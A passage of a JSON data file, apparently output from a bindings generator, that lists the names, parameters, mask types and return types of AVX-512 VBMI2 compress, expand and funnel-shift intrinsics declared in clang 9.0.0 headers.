"__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expand_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_expand_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expand_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:92:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_expandloadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expandloadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_expandloadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_expandloadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask64" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:216:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:223:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:231:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:239:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:246:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:254:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:262:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:269:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shldv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:277:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:285:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:292:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shrdv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:300:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:308:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:315:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shrdv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:323:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:331:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_mask_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:338:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm512_maskz_shrdv_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vbmi2intrin.h:346:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m512i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m512i" } }], "return-type": { "tag": "__m512i" } }, { "tag": "function", "name": "_mm_mask_compress_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:22:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_compress_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_compress_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:38:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_compress_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:46:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_compressstoreu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_compressstoreu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:61:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm_mask_expand_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:68:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expand_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:76:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_expand_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expand_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:92:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_expandloadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:100:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expandloadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_expandloadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:116:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_expandloadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:124:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_mask_compress_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:132:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_compress_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:140:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_compress_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:148:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_compress_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:156:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_compressstoreu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:164:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_compressstoreu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:171:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": ":void" } }, { "tag": "function", "name": "_mm256_mask_expand_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:178:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expand_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_expand_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:194:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expand_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:202:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__D", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_expandloadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:210:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expandloadu_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:218:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask16" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_expandloadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:226:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__S", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_expandloadu_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:234:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask32" } }, { "tag": "parameter", "name": "__P", "type": { "tag": ":pointer", "type": { "tag": ":void" } } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:410:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:417:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:433:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:440:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shldv_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:448:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:456:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_mask_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:463:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm256_maskz_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:471:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:479:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_mask_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:486:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__U", "type": { "tag": "__mmask8" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maskz_shldv_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlvbmi2intrin.h:494:1", "variadic": false, "inline": true, "storage-class": "static", 